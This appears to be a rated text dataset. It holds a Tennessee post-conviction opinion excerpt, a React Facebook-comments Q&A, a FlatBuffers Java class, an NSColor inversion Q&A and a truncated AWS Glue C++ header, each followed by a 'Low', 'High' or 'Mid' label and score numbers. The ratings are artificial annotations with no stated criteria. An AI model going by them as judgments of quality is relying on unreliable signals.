S.W.3d 453, 461 (Tenn. 1999). During our review of the issues raised, we will afford those findings of fact the weight of a jury verdict, and this Court is bound by the post-conviction court’s findings unless the evidence in the record preponderates against those findings. See Henley v. State, 960 S.W.2d 572, 578 (Tenn. 1997); Alley v. State, 958 S.W.2d 138, 147 (Tenn. Crim. App. 1997). This Court may not reweigh or re-evaluate the evidence, nor substitute its inferences for those drawn by the post-conviction court. See State v. Honeycutt, 54 S.W.3d 762, 766 (Tenn. 2001). However, the post-conviction court’s conclusions of law are reviewed under a purely de novo standard with no presumption of correctness. See Shields v. State, 40 S.W.3d 450, 458 (Tenn. 2001). Ineffective Assistance of Counsel When a petitioner seeks post-conviction relief on the basis of ineffective assistance of counsel, the petitioner bears the burden of showing (a) that the services rendered by trial counsel were deficient and (b) that the deficient performance was prejudicial. See Powers v. State, 942 S.W.2d 551, 558 (Tenn. Crim. App. 1996). In order to demonstrate deficient performance, the petitioner must show that the services rendered or the advice given was below “the range of competence demanded of attorneys in criminal cases.” Baxter v. Rose, 523 S.W.2d 930, 936 (Tenn. -5- 1975). In order to demonstrate prejudice, the petitioner must show that there is a reasonable probability that, but for counsel’s deficient performance, the result of the proceeding would have been different. See Strickland v. Washington, 466 U.S. 668, 694 (1984). “Because a petitioner must establish both prongs of the test to prevail on a claim of ineffective assistance of counsel, failure to prove either deficient performance or resulting prejudice provides a sufficient basis to deny relief on the claim.” Henley, 960 S.W.2d at 580 (Tenn. 1997). As noted above, this Court will afford the post-conviction court’s factual findings a presumption of correctness, rendering them conclusive on appeal unless the record preponderates against the court’s findings. See id. at 578. However, our supreme court has “determined that issues of deficient performance by counsel and possible prejudice to the defense are mixed questions of law and fact . . . ; thus, [appellate] review of [these issues] is de novo” with no presumption of correctness. Burns, 6 S.W.3d at 461. Furthermore, on claims of ineffective assistance of counsel, the petitioner is not entitled to the benefit of hindsight. See Adkins v. State, 911 S.W.2d 334, 347 (Tenn. 1994). This Court may not second-guess a reasonably-based trial strategy, and we cannot grant relief based on a sound, but unsuccessful, tactical decision made during the course of the proceedings. See id. However, such deference to the tactical decisions of counsel applies only if counsel makes those decisions after adequate preparation for the case. See Cooper v. State, 847 S.W.2d 521, 528 (Tenn. Crim. App. 1992). Once a guilty plea has been entered, effectiveness of counsel is relevant only to the extent that it affects the voluntariness of the plea. In this respect, such claims of ineffective assistance necessarily implicate the principle that guilty pleas be voluntarily and intelligently made. See Hill v. Lockhart, 474 U.S. 52, 56 (1985) (citing North Carolina v. Alford, 400 U.S. 25, 31 (1970)). As stated above, in order to successfully challenge the effectiveness of counsel, Petitioner must demonstrate that counsel’s representation fell below the range of competence demanded of attorneys in criminal cases. See Baxter, 523 S.W.2d at 936. Under Strickland, 466 U.S. at 694. Petitioner must establish: (1) deficient representation; and (2) prejudice resulting from the deficiency. However, in the context of a guilty plea, to satisfy the second prong of Strickland, Petitioner must show that “there is a reasonable probability that, but for counsel’s errors, he would not have pleaded guilty and would have insisted on going to trial.” Hill, 474 U.S. at 59; see also Walton v. State, 966 S.W.2d 54, 55 (Tenn. Crim. App. 1997). When analyzing a guilty plea, we look to the federal standard announced in Boykin v. Alabama, 395 U.S. 238 (1969), and the State standard set out in State v. Mackey, 553 S.W.2d 337 (Tenn. 1977). State v. Pettus, 986 S.W.2d 540, 542 (Tenn. 1999). In Boykin, the United States Supreme Court held that there must be an affirmative showing in the trial court that a guilty plea was voluntarily and knowingly given before it can be accepted. Boykin, 395 U.S. at 242. Similarly, our Tennessee Supreme Court in Mackey required an affirmative showing of a voluntary and knowing guilty plea, namely, that the defendant has been made aware of the significant consequences of such a plea. Pettus, 986 S.W.2d at 542. -6- A plea is not “voluntary” if it results from ignorance, misunderstanding, coercion, inducements, or threats. Blankenship v. State, 858 S.W.2d 897, 904 (Tenn. 1993). The trial court must determine if the guilty plea is “knowing” by questioning the defendant to make sure he fully understands the plea and its consequences. Pettus, 986 S.W.2d at 542; Blankenship, 858 S.W.2d at 904. Petitioner Gomez On appeal, Petitioner Gomez contends that he did not receive “effective assistance of counsel” because he “ended up with a plea he didn’t understand . . . [and] didn’t fully appreciate the consequences of his actions” and that this led to an adverse effect on the defense, proving the “second prong” of ineffective assistance of counsel. Petitioner seems to argue that the allegedly deficient performance by his trial counsel led to a presumptively prejudicial effect, proving that he received ineffective assistance of counsel. Petitioner also argues that his guilty plea was not knowingly or voluntarily entered because he was unable to understand the plea “because of his lack of English.” In the case herein, Petitioner Gomez has failed to show that his trial counsel were deficient, much less presumptively prejudicial as he argues. Moreover, Petitioner Gomez has failed to show that but for trial counsel’s alleged deficiencies, he would have refused to plead guilty and insisted on going to trial. The transcript of the guilty plea hearing reflects that the trial court went to great lengths to discuss the ramifications of the guilty plea with Petitioner Gomez. There was an interpreter present who translated everything at the hearing. Petitioner Gomez was thoroughly questioned by the trial court to ascertain whether he understood the effects of the plea. Petitioner Gomez complains that he had no choice but to plead guilty, he did not understand what he was doing, and trial counsel did not present “all the issues.” Further, he complains that the plea offer was not explained in Spanish, and he was led to believe by trial counsel that his case was hopeless. In other words, that he was coerced into pleading guilty. After hearing the evidence, the post-conviction court accredited the testimony of trial counsel and discredited Petitioner Gomez’s testimony. The post-conviction court specifically found that Petitioner Gomez “lied under oath” and that he “understood what he was doing” when he pled guilty. The plea hearing indicates that Petitioner knew what he was doing, understood the plea, and agreed that it was what he wanted to do to resolve the case. Petitioner Gomez himself admitted that he had previously entered a guilty plea in New York. The post-conviction court noted that it was a “tough case” in which the attorneys would “be remiss if they had not been very adamant to their clients about what could and might happen in the case” but that their advice to Petitioner Gomez did not amount to “undue influence.” Petitioner has failed to show by clear and convincing evidence that he received ineffective assistance of counsel or that his guilty plea was involuntary. Petitioner Gomez is not entitled to relief. -7- Petitioner Delacruz On appeal, Petitioner Delacruz argues that the post-conviction court “committed an error in finding that his guilty pleas was [sic] entered knowingly and voluntarily” where the proof established that he was “reluctant” to enter the guilty plea and even “refused” the plea prior to the guilty plea hearing and did not understand the charges that he was facing. Petitioner also alleges that post- conviction relief is appropriate when “the guilty plea does not conform to the due process standard.” In the case herein, Petitioner Delacruz has failed to show that his trial counsel were deficient. Moreover, Petitioner Delacruz has failed to show that but for trial counsel’s alleged deficiencies, he would have refused to plead guilty and insisted on going to trial. Again, the transcript of the guilty plea hearing reflects that the trial court went to great lengths to discuss the ramifications of the guilty plea with Petitioner Delacruz. As with Petitioner Gomez, there was an interpreter present who translated everything at the hearing. Petitioner Delacruz was repeatedly asked by the trial court if he understood the effects of the plea. Petitioner Delacruz complains that he had no choice but to plead guilty and he did not understand what he was doing. Specifically, he complains that counsel’s undue influence led him to believe he had “no realistic choice” but to plead guilty. In other words, that he was coerced into pleading guilty. The post-conviction court accredited the testimony of trial counsel, finding that there was no deficient representation on the part of his attorneys. In fact, the testimony from trial counsel indicated that they were careful to have an interpreter present when they were having meetings with Petitioner Delacruz that dealt with substantive matters. While Petitioner Delacruz initially did not want to plead guilty, he decided after the initial meeting to accept the offer. We recognize that because of a language barrier, Petitioner Delacruz may have had difficulty understanding portions of the plea, specifically, the definitions of felony murder and criminal responsibility. However, the testimony from trial counsel indicated that these terms were fully and completely explained to Petitioner Delacruz through an interpreter prior to the entry of the plea. Finally, even though Petitioner Delacruz claims that he had no choice but to plead guilty, the plea hearing indicates that Petitioner knew what he was doing, understood the plea, and agreed that it was what he wanted to do to resolve the case. Petitioner Delacruz himself admitted to the post- conviction court that he had prior experience with guilty pleas. The post-conviction court noted that the attorneys “went above and beyond what was required and did an outstanding job in preparing their cases.” Petitioner has failed to show by clear and convincing evidence that he received ineffective assistance of counsel or that his guilty plea was involuntary. Petitioner is not entitled to relief. Petitioner Delacruz also makes an argument that his guilty plea did not comply with due process requirements. We concur in the State’s assessment of Petitioner Delacruz’s brief in that it makes a conclusory allegation without citing any authority to support this argument. Rule 27(a)(7) of the Tennessee Rules of Appellate Procedure provides that a brief shall contain “[a]n argument . . . setting forth the contentions of the appellant with respect to the issues presented, and the reasons therefor, including the reasons why the contentions require appellate relief, with citations to the -8- authorities and appropriate references to the record . . . relied on.” Tennessee Court of Criminal Appeals Rule 10(b) states that “[i]ssues which are not supported by argument, citation to authorities, or appropriate references to the record will be treated as waived in this court.” See also State v. Sanders, 842 S.W.2d 257 (Tenn. Crim. App. 1992) (determining that issue was waived where defendant cited no authority to support his complaint). Because Petitioner Delacruz has failed to comply with Tennessee Rule of Appellate Procedure 27(a)(7) and Tennessee Court of Criminal Appeals Rule 10(b), he has waived this issue. Conclusion For the foregoing reasons, the judgments of the post-conviction court are affirmed. ___________________________________ JERRY L. SMITH, JUDGE -9-
Low
[ 0.53066037735849, 28.125, 24.875 ]
Q: Facebook Comment is not shown on page i just added Facebook Comment Plugin on my website created with NodeJS and ReactJS and this is generated code <div id="fb-root"></div> <script async defer crossOrigin="anonymous" src="https://connect.facebook.net/ka_GE/sdk.js#xfbml=1&version=v3.3"></script>\ <div className="fb-comments" data-href="http://localhost:3000/recipe/:id/:name" data-width="" data-numposts="5"></div> but it does not shows anything on the page, i use chrome and i disabled adblock on that page but nothing changed anyway, what is the reason of this and how can I fix it? Thanks A: You must use library react-facebook, in example : import React, { Component} from 'react'; import { FacebookProvider, Comments } from 'react-facebook'; export default class Example extends Component { render() { return ( <FacebookProvider appId="123456789"> <Comments href="http://www.facebook.com" /> </FacebookProvider> ); } } You can find it at npmjs for more detail.
High
[ 0.6878787878787871, 28.375, 12.875 ]
// automatically generated by the FlatBuffers compiler, do not modify package com.google.ar.sceneform.lullmodel; import java.nio.*; import java.util.*; import com.google.flatbuffers.*; @SuppressWarnings("unused") /** * Data type for 3-dimensional vector values to be stored in a VariantDef. */ public final class DataVec3 extends Table { public static DataVec3 getRootAsDataVec3(ByteBuffer _bb) { return getRootAsDataVec3(_bb, new DataVec3()); } public static DataVec3 getRootAsDataVec3(ByteBuffer _bb, DataVec3 obj) { _bb.order(ByteOrder.LITTLE_ENDIAN); return (obj.__assign(_bb.getInt(_bb.position()) + _bb.position(), _bb)); } public void __init(int _i, ByteBuffer _bb) { bb_pos = _i; bb = _bb; vtable_start = bb_pos - bb.getInt(bb_pos); vtable_size = bb.getShort(vtable_start); } public DataVec3 __assign(int _i, ByteBuffer _bb) { __init(_i, _bb); return this; } public Vec3 value() { return value(new Vec3()); } public Vec3 value(Vec3 obj) { int o = __offset(4); return o != 0 ? obj.__assign(o + bb_pos, bb) : null; } public static void startDataVec3(FlatBufferBuilder builder) { builder.startObject(1); } public static void addValue(FlatBufferBuilder builder, int valueOffset) { builder.addStruct(0, valueOffset, 0); } public static int endDataVec3(FlatBufferBuilder builder) { int o = builder.endObject(); return o; } }
Low
[ 0.44690265486725606, 25.25, 31.25 ]
Q: Is there a conventional method for inverting NSColor values? I'm looking for a way to invert arbitrary NSColor values at runtime, and there doesn't appear to be any built-in method to do so. I will be using a category to extend NSColor as follows: NSColor * invertedColor = [someOtherColor inverted]; Here is the category method prototype that I am using: @implementation NSColor (MyCategories) - (NSColor *)inverted { NSColor * original = [self colorUsingColorSpaceName: NSCalibratedRGBColorSpace]; return ...? } @end Can anyone fill in the blanks? This doesn't have to be perfect, but I would like it to make some sense. i.e.: [[[NSColor someColor] inverted] inverted] would result in a color very close to the original color [[NSColor whiteColor] inverted] would be very close to [NSColor blackColor] Inverted colors would be on opposite sides of the color wheel. (red & green, yellow & violet, etc.) The alpha value should remain the same as the original NSColor. I'm only looking to invert the color, not the transparency. UPDATE 3: (now in color!) It turns out that using a complementary color (a color with a hue 180° away from the original hue) is not quite enough, since white and black don't really have a hue value. Starting from the answer provided by phoebus, this is what I came up with: CGFloat hue = [original hueComponent]; if (hue >= 0.5) { hue -= 0.5; } else { hue += 0.5; } return [NSColor colorWithCalibratedHue:hue saturation:[original saturationComponent] brightness:(1.0 - [original brightnessComponent]) alpha:[original alphaComponent]]; The hue is still rotated 180°, but I also invert the brightness component so that very dark colors become very bright (and vice versa). This takes care of the black and white cases, but it inverts just about every color to black (which violates my double-inversion rule). Here are the results: Now, Peter Hosey's approach is much simpler, and it produces better results: return [NSColor colorWithCalibratedRed:(1.0 - [original redComponent]) green:(1.0 - [original greenComponent]) blue:(1.0 - [original blueComponent]) alpha:[original alphaComponent]]; in Swift 4.2: extension NSColor { func inverted() -> NSColor? { return NSColor(calibratedRed: 1.0 - redComponent, green: 1.0 - greenComponent, blue: 1.0 - blueComponent, alpha: alphaComponent) } } A: Simple: The components are all 0–1, so subtract each component from 1 to get the complement's value. Examples: Red = 1, 0, 0; complement = 0, 1, 1 = cyan Yellow = 1, 1, 0; complement = 0, 0, 1 = blue White = 1, 1, 1; complement = 0, 0, 0 = black Deep orange = 1, 0.25, 0; complement = 0, 0.75, 1 = sky blue As you can guess, this is a symmetric operation. Inverting the inverse will get you exactly the color you started with. A: From what you describe, it sounds like what you really want is a function to find a color's complement, not its inverse. Inverting means something different in this context. Here's a StackOverflow question regarding complements in JavaScript. Perhaps some of the code is adaptable? Here is some interesting and potentially useful info about the various ways color can be worked with in Cocoa color spaces. From what it looks like here, if you can use the HSV color space, then the complement of a color could be found by simply taking hue > 179 ? hue -= 180 : hue = += 180, since the hues are defined around the color wheel in a full circle.
Mid
[ 0.593548387096774, 34.5, 23.625 ]
/** * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * SPDX-License-Identifier: Apache-2.0. */ #pragma once #include <aws/glue/Glue_EXPORTS.h> #include <aws/glue/GlueRequest.h> #include <aws/core/utils/memory/stl/AWSString.h> #include <aws/core/utils/memory/stl/AWSVector.h> #include <aws/glue/model/DevEndpointCustomLibraries.h> #include <aws/core/utils/memory/stl/AWSMap.h> #include <utility> namespace Aws { namespace Glue { namespace Model { /** */ class AWS_GLUE_API UpdateDevEndpointRequest : public GlueRequest { public: UpdateDevEndpointRequest(); // Service request name is the Operation name which will send this request out, // each operation should has unique request name, so that we can get operation's name from this request. // Note: this is not true for response, multiple operations may have the same response name, // so we can not get operation's name from response. inline virtual const char* GetServiceRequestName() const override { return "UpdateDevEndpoint"; } Aws::String SerializePayload() const override; Aws::Http::HeaderValueCollection GetRequestSpecificHeaders() const override; /** * <p>The name of the <code>DevEndpoint</code> to be updated.</p> */ inline const Aws::String& GetEndpointName() const{ return m_endpointName; } /** * <p>The name of the <code>DevEndpoint</code> to be updated.</p> */ inline bool EndpointNameHasBeenSet() const { return m_endpointNameHasBeenSet; } /** * <p>The name of the <code>DevEndpoint</code> to be updated.</p> */ inline void SetEndpointName(const Aws::String& value) { m_endpointNameHasBeenSet = true; m_endpointName = value; } /** * <p>The name of the <code>DevEndpoint</code> to be updated.</p> */ inline void SetEndpointName(Aws::String&& value) { m_endpointNameHasBeenSet = true; m_endpointName = std::move(value); } /** * <p>The name of the <code>DevEndpoint</code> to be updated.</p> */ inline void SetEndpointName(const char* value) { m_endpointNameHasBeenSet = true; m_endpointName.assign(value); } /** * <p>The name of the <code>DevEndpoint</code> to be updated.</p> */ inline UpdateDevEndpointRequest& WithEndpointName(const Aws::String& value) { SetEndpointName(value); return *this;} /** * <p>The name of the <code>DevEndpoint</code> to be updated.</p> */ inline UpdateDevEndpointRequest& WithEndpointName(Aws::String&& value) { SetEndpointName(std::move(value)); return *this;} /** * <p>The name of the <code>DevEndpoint</code> to be updated.</p> */ inline UpdateDevEndpointRequest& WithEndpointName(const char* value) { SetEndpointName(value); return *this;} /** * <p>The public key for the <code>DevEndpoint</code> to use.</p> */ inline const Aws::String& GetPublicKey() const{ return m_publicKey; } /** * <p>The public key for the <code>DevEndpoint</code> to use.</p> */ inline bool PublicKeyHasBeenSet() const { return m_publicKeyHasBeenSet; } /** * <p>The public key for the <code>DevEndpoint</code> to use.</p> */ inline void SetPublicKey(const Aws::String& value) { m_publicKeyHasBeenSet = true; m_publicKey = value; } /** * <p>The public key for the <code>DevEndpoint</code> to use.</p> */ inline void SetPublicKey(Aws::String&& value) { m_publicKeyHasBeenSet = true; m_publicKey = std::move(value); } /** * <p>The public key for the <code>DevEndpoint</code> to use.</p> */ inline void SetPublicKey(const char* value) { m_publicKeyHasBeenSet = true; m_publicKey.assign(value); } /** * <p>The public key for the <code>DevEndpoint</code> to use.</p> */ inline UpdateDevEndpointRequest& WithPublicKey(const Aws::String& value) { SetPublicKey(value); return *this;} /** * <p>The public key for the <code>DevEndpoint</code> to use.</p> */ inline UpdateDevEndpointRequest& WithPublicKey(Aws::String&& value) { SetPublicKey(std::move(value)); return *this;} /** * <p>The public key for the <code>DevEndpoint</code> to use.</p> */ inline UpdateDevEndpointRequest& WithPublicKey(const char* value) { SetPublicKey(value); return *this;} /** * <p>The list of public keys for the <code>DevEndpoint</code> to use.</p> */ inline const Aws::Vector<Aws::String>& GetAddPublicKeys() const{ return m_addPublicKeys; } /** * <p>The list of public keys for the <code>DevEndpoint</code> to use.</p> */ inline bool AddPublicKeysHasBeenSet() const { return m_addPublicKeysHasBeenSet; } /** * <p>The list of public keys for the <code>DevEndpoint</code> to use.</p> */ inline void SetAddPublicKeys(const Aws::Vector<Aws::String>& value) { m_addPublicKeysHasBeenSet = true; m_addPublicKeys = value; } /** * <p>The list of public keys for the <code>DevEndpoint</code> to use.</p> */ inline void SetAddPublicKeys(Aws::Vector<Aws::String>&& value) { m_addPublicKeysHasBeenSet = true; m_addPublicKeys = std::move(value); } /** * <p>The list of public keys for the <code>DevEndpoint</code> to use.</p> */ inline UpdateDevEndpointRequest& WithAddPublicKeys(const Aws::Vector<Aws::String>& value) { SetAddPublicKeys(value); return *this;} /** * <p>The list of public keys for the <code>DevEndpoint</code> to use.</p> */ inline UpdateDevEndpointRequest& WithAddPublicKeys(Aws::Vector<Aws::String>&& value) { SetAddPublicKeys(std::move(value)); return *this;} /** * <p>The list of public keys for the <code>DevEndpoint</code> to use.</p> */ inline UpdateDevEndpointRequest& AddAddPublicKeys(const Aws::String& value) { m_addPublicKeysHasBeenSet = true; m_addPublicKeys.push_back(value); return *this; } /** * <p>The list of public keys for the <code>DevEndpoint</code> to use.</p> */ inline UpdateDevEndpointRequest& AddAddPublicKeys(Aws::String&& value) { m_addPublicKeysHasBeenSet = true; m_addPublicKeys.push_back(std::move(value)); return *this; } /** * <p>The list of public keys for the <code>DevEndpoint</code> to use.</p> */ inline UpdateDevEndpointRequest& AddAddPublicKeys(const char* value) { m_addPublicKeysHasBeenSet = true; m_addPublicKeys.push_back(value); return *this; } /** * <p>The list of public keys to be deleted from the <code>DevEndpoint</code>.</p> */ inline const Aws::Vector<Aws::String>& GetDeletePublicKeys() const{ return m_deletePublicKeys; } /** * <p>The list of public keys to be deleted from the <code>DevEndpoint</code>.</p> */ inline bool DeletePublicKeysHasBeenSet() const { return m_deletePublicKeysHasBeenSet; } /** * <p>The list of public keys to be deleted from the <code>DevEndpoint</code>.</p> */ inline void SetDeletePublicKeys(const Aws::Vector<Aws::String>& value) { m_deletePublicKeysHasBeenSet = true; m_deletePublicKeys = value; } /** * <p>The list of public keys to be deleted from the <code>DevEndpoint</code>.</p> */ inline void SetDeletePublicKeys(Aws::Vector<Aws::String>&& value) { m_deletePublicKeysHasBeenSet = true; m_deletePublicKeys = std::move(value); } /** * <p>The list of public keys to be deleted from the <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& WithDeletePublicKeys(const Aws::Vector<Aws::String>& value) { SetDeletePublicKeys(value); return *this;} /** * <p>The list of public keys to be deleted from the <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& WithDeletePublicKeys(Aws::Vector<Aws::String>&& value) { SetDeletePublicKeys(std::move(value)); return *this;} /** * <p>The list of public keys to be deleted from the <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& AddDeletePublicKeys(const Aws::String& value) { m_deletePublicKeysHasBeenSet = true; m_deletePublicKeys.push_back(value); return *this; } /** * <p>The list of public keys to be deleted from the <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& AddDeletePublicKeys(Aws::String&& value) { m_deletePublicKeysHasBeenSet = true; m_deletePublicKeys.push_back(std::move(value)); return *this; } /** * <p>The list of public keys to be deleted from the <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& AddDeletePublicKeys(const char* value) { m_deletePublicKeysHasBeenSet = true; m_deletePublicKeys.push_back(value); return *this; } /** * <p>Custom Python or Java libraries to be loaded in the * <code>DevEndpoint</code>.</p> */ inline const DevEndpointCustomLibraries& GetCustomLibraries() const{ return m_customLibraries; } /** * <p>Custom Python or Java libraries to be loaded in the * <code>DevEndpoint</code>.</p> */ inline bool CustomLibrariesHasBeenSet() const { return m_customLibrariesHasBeenSet; } /** * <p>Custom Python or Java libraries to be loaded in the * <code>DevEndpoint</code>.</p> */ inline void SetCustomLibraries(const DevEndpointCustomLibraries& value) { m_customLibrariesHasBeenSet = true; m_customLibraries = value; } /** * <p>Custom Python or Java libraries to be loaded in the * <code>DevEndpoint</code>.</p> */ inline void SetCustomLibraries(DevEndpointCustomLibraries&& value) { m_customLibrariesHasBeenSet = true; m_customLibraries = std::move(value); } /** * <p>Custom Python or Java libraries to be loaded in the * <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& WithCustomLibraries(const DevEndpointCustomLibraries& value) { SetCustomLibraries(value); return *this;} /** * <p>Custom Python or Java libraries to be loaded in the * <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& WithCustomLibraries(DevEndpointCustomLibraries&& value) { SetCustomLibraries(std::move(value)); return *this;} /** * <p> <code>True</code> if the list of custom libraries to be loaded in the * development endpoint needs to be updated, or <code>False</code> if * otherwise.</p> */ inline bool GetUpdateEtlLibraries() const{ return m_updateEtlLibraries; } /** * <p> <code>True</code> if the list of custom libraries to be loaded in the * development endpoint needs to be updated, or <code>False</code> if * otherwise.</p> */ inline bool UpdateEtlLibrariesHasBeenSet() const { return m_updateEtlLibrariesHasBeenSet; } /** * <p> <code>True</code> if the list of custom libraries to be loaded in the * development endpoint needs to be updated, or <code>False</code> if * otherwise.</p> */ inline void SetUpdateEtlLibraries(bool value) { m_updateEtlLibrariesHasBeenSet = true; m_updateEtlLibraries = value; } /** * <p> <code>True</code> if the list of custom libraries to be loaded in the * development endpoint needs to be updated, or <code>False</code> if * otherwise.</p> */ inline UpdateDevEndpointRequest& WithUpdateEtlLibraries(bool value) { SetUpdateEtlLibraries(value); return *this;} /** * <p>The list of argument keys to be deleted from the map of arguments used to * configure the <code>DevEndpoint</code>.</p> */ inline const Aws::Vector<Aws::String>& GetDeleteArguments() const{ return m_deleteArguments; } /** * <p>The list of argument keys to be deleted from the map of arguments used to * configure the <code>DevEndpoint</code>.</p> */ inline bool DeleteArgumentsHasBeenSet() const { return m_deleteArgumentsHasBeenSet; } /** * <p>The list of argument keys to be deleted from the map of arguments used to * configure the <code>DevEndpoint</code>.</p> */ inline void SetDeleteArguments(const Aws::Vector<Aws::String>& value) { m_deleteArgumentsHasBeenSet = true; m_deleteArguments = value; } /** * <p>The list of argument keys to be deleted from the map of arguments used to * configure the <code>DevEndpoint</code>.</p> */ inline void SetDeleteArguments(Aws::Vector<Aws::String>&& value) { m_deleteArgumentsHasBeenSet = true; m_deleteArguments = std::move(value); } /** * <p>The list of argument keys to be deleted from the map of arguments used to * configure the <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& WithDeleteArguments(const Aws::Vector<Aws::String>& value) { SetDeleteArguments(value); return *this;} /** * <p>The list of argument keys to be deleted from the map of arguments used to * configure the <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& WithDeleteArguments(Aws::Vector<Aws::String>&& value) { SetDeleteArguments(std::move(value)); return *this;} /** * <p>The list of argument keys to be deleted from the map of arguments used to * configure the <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& AddDeleteArguments(const Aws::String& value) { m_deleteArgumentsHasBeenSet = true; m_deleteArguments.push_back(value); return *this; } /** * <p>The list of argument keys to be deleted from the map of arguments used to * configure the <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& AddDeleteArguments(Aws::String&& value) { m_deleteArgumentsHasBeenSet = true; m_deleteArguments.push_back(std::move(value)); return *this; } /** * <p>The list of argument keys to be deleted from the map of arguments used to * configure the <code>DevEndpoint</code>.</p> */ inline UpdateDevEndpointRequest& AddDeleteArguments(const char* value) { m_deleteArgumentsHasBeenSet = true; m_deleteArguments.push_back(value); return *this; } /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline const Aws::Map<Aws::String, Aws::String>& GetAddArguments() const{ return m_addArguments; } /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline bool AddArgumentsHasBeenSet() const { return m_addArgumentsHasBeenSet; } /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline void SetAddArguments(const Aws::Map<Aws::String, Aws::String>& value) { m_addArgumentsHasBeenSet = true; m_addArguments = value; } /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline void SetAddArguments(Aws::Map<Aws::String, Aws::String>&& value) { m_addArgumentsHasBeenSet = true; m_addArguments = std::move(value); } /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline UpdateDevEndpointRequest& WithAddArguments(const Aws::Map<Aws::String, Aws::String>& value) { SetAddArguments(value); return *this;} /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline UpdateDevEndpointRequest& WithAddArguments(Aws::Map<Aws::String, Aws::String>&& value) { SetAddArguments(std::move(value)); return *this;} /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline UpdateDevEndpointRequest& AddAddArguments(const Aws::String& key, const Aws::String& value) { m_addArgumentsHasBeenSet = true; m_addArguments.emplace(key, value); return *this; } /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline UpdateDevEndpointRequest& AddAddArguments(Aws::String&& key, const Aws::String& value) { 